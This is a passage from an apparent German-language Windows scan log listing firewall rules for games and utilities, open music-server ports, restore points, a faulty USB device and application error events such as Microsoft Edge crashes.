FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{65F0AC5B-FAD0-4DCB-97AB-96BBB9E57190}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\State of Decay\StateOfDecay.exe
FirewallRules: [{3E6A480D-F34A-4741-98C6-B1F9536E20CE}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\State of Decay\StateOfDecay.exe
FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{D8364153-FBDA-4BF8-874F-3EF0AA7A2CA2}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{3511DCB6-3696-4003-9724-E9984F76E1A4}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{A4441CA1-9D96-4E38-A86D-A0A9BE2CDD61}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{19DCF7E7-BB17-45EA-9008-66334D30A0D1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Metro Last Light\MetroLL.exe
FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{27DA54EA-7C9B-4B97-96C6-942F80047372}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{78F6F092-69FD-4D36-922F-1CE3D31835A1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C2CDA1DC-8DE3-45A6-94B3-F0706241CBD8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Deus Ex Mankind Divided\retail\DXMD.exe
FirewallRules: [{B6E395BA-E7C0-4F0F-9AC2-27524731F328}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Deus Ex Mankind Divided\retail\DXMD.exe
FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{7CC665E9-63CB-4739-8C40-0F18A0FF24D5}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{3A2DD2AC-B60D-47B7-885A-C75AB3598542}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445
FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445
FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{E2F272A9-9C2D-4153-A6E8-B0CA7DEC952E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{580F9D58-147D-49C8-8860-72B82CBFB810}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{88E2825B-75D6-4FA2-9C1B-2860CC650742}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{D310D4B3-D134-4238-B418-B4DE564E9A7A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{CBC3E334-A8AA-4AA9-8952-0DDC79CEEFC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{655103CF-CF71-4333-B671-2AB29537C58B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A98E4A31-D7CC-4141-8318-5666E0BE2FBF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C957F22E-1F7B-4C1A-80E1-F7CDA0A136D7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{DE2FAC41-C0B2-4FBB-B0E2-260817A7AA70}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{CD214533-670D-4629-ACF1-B4900817F6E1}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{9CE093E1-63AA-46F8-944A-5818E43AABF5}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{965847FA-3EC0-4CDC-B5B3-DA17E209E3EA}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{35A6D9BD-B597-4C06-9393-8455B22E6389}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp

==================== Wiederherstellungspunkte =========================

24-07-2017 18:17:25 Avira System Speedup Optimierung
31-07-2017 01:36:50 Removed simplitec simplicheck
01-08-2017 12:29:49 Malwarebytes Anti-Rootkit Restore Point

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard-USB-Hostcontroller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/01/2017 11:58:55 AM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. 

Kontext: Windows Anwendung

Details:
	Falscher Parameter.  (HRESULT : 0x80070057) (0x80070057)

Error: (08/01/2017 03:56:53 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "18344". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.

Error: (08/01/2017 03:56:53 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "18344". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.

Error: (08/01/2017 02:22:16 AM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. 

Kontext: Windows Anwendung

Details:
	Falscher Parameter.  (HRESULT : 0x80070057) (0x80070057)

Error: (08/01/2017 02:11:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MicrosoftEdge.exe, Version: 11.0.15063.447, Zeitstempel: 0x5948acf2
Name des fehlerhaften Moduls: CoreUIComponents.dll, Version: 10.0.15063.483, Zeitstempel: 0x1b3f5968
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000077bd2
ID des fehlerhaften Prozesses: 0x2264
Startzeit der fehlerhaften Anwendung: 0x01d30a5aa80784e4
Pfad der fehlerhaften Anwendung: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
Berichtskennung: ba034c06-b31b-4616-a727-834271c8bc89
Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: MicrosoftEdge

Error: (07/31/2017 08:55:58 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (07/31/2017 08:36:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MicrosoftEdge.exe, Version: 11.0.15063.447, Zeitstempel: 0x5948acf2
Name des fehlerhaften Moduls: CoreUIComponents.dll, Version: 10.0.15063.483, Zeitstempel: 0x1b3f5968
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000077bd2
ID des fehlerhaften Prozesses: 0xfe4
Startzeit der fehlerhaften Anwendung: 0x01d30a2bdb590385
Pfad der fehlerhaften Anwendung: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
Berichtskennung: 2a5c4221-e13a-4d9c-9167-16130416246f
Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: MicrosoftEdge

